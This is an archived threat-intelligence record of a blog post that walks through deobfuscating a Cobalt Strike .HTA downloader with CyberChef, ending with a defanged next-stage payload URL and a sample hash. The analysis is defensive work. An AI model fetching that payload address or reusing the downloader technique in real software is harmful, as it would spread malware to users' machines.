{ "id": "be77674c-604f-4428-9281-8a74e33bc61b", "created_at": "2026-04-06T00:07:31.823059Z", "updated_at": "2026-04-10T03:24:23.67226Z", "deleted_at": null, "sha1_hash": "b732832eef76b4c9db4b21a447d087d5db780b81", "title": "Decoding a Cobalt Strike Downloader Script With CyberChef", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2565499, "plain_text": "Decoding a Cobalt Strike Downloader Script With CyberChef\r\nBy Matthew\r\nPublished: 2024-08-04 ยท Archived: 2026-04-05 19:41:11 UTC\r\nIntroduction\r\nWe recently encountered a short .HTA script on Malware Bazaar that was linked to the Cobalt Strike toolkit.\r\nThe script utilises basic obfuscation that can be removed using CyberChef and a text editor. This blog will cover\r\nour decoding process, including how to decode the following obfuscation methods\r\nBase64\r\nURL Encoding\r\nExcessive Spacing\r\nOriginal File\r\nThe file used for this analysis can be found on Malware Bazaar at the following link.\r\n2807199adde4730e5e89c5f0ed3d48380dac746a44fa1e5fe0ca0186743a97e0\r\nAnalysis\r\nThe .HTA file in it's initial state contains a small amount of HTML followed by a large batch of URL encoded\r\ncharacters.\r\nThe first step to decoding the URL encoded content is to use a tool like CyberChef and the URL Decode\r\noperation.\r\nAs can be seen below, this decodes the content but reveals another layer of URL encoding.\r\nhttps://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nPage 1 of 5\n\nThe second layer of URL encoding can be resolved with another URL Decode operation.\r\nApplying the filter again removes the last of the URL encoding.\r\nThe content can now be moved back to a text editor for additional analysis.\r\nAlthough the script is removed of URL encoding, the script now employs blobs of spaces to hinder analysis. This\r\ncan be seen in the screenshot below.\r\nhttps://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nPage 2 of 5\n\nThe spacing can be removed manually by highlighting and deleting, but a more efficient means is to use a regular\r\nexpression to remove occurrences of two or more whitespace characters \\s\r\nBy performing a search and replace with the \\s\\s+ query, we can see the excessive spacing is highlighted and\r\nmatched correctly.\r\nBy specifying a replace value of a single space, the content can be cleaned up significantly.\r\nThe script content can now fit easily into a single screenshot.\r\nhttps://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nPage 3 of 5\n\nA large blob of base64 content can be seen in the resulting content. This is alongside the key giveaway of\r\nfrombase64string with random upper and lower casing.\r\nThe base64 blob can be copied and decoded in CyberChef using From Base64\r\nhttps://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nPage 4 of 5\n\nThe resulting content contains more excessive spacing. The same regular expression technique as before can be\r\nre-applied to fix this.\r\nBelow we can see the From Base64 operation and the removal of excessive spacing via regex.\r\nAfter the spacing is removed, it becomes clear that the code is a downloader utilising the URLDownloadToFile\r\nfunction.\r\nThe address of the next stage file is also clearly visible, and contains the value\r\nhttp://198.46[.]178.144/morningfiledatinglover[.]vbs\r\nSource: https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nhttps://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.embeeresearch.io/decoding-a-cobalt-strike-downloader-script-with-cyberchef/" ], "report_names": [ "decoding-a-cobalt-strike-downloader-script-with-cyberchef" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434051, "ts_updated_at": 1775791463, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b732832eef76b4c9db4b21a447d087d5db780b81.pdf", "text": "https://archive.orkl.eu/b732832eef76b4c9db4b21a447d087d5db780b81.txt", "img": "https://archive.orkl.eu/b732832eef76b4c9db4b21a447d087d5db780b81.jpg" } }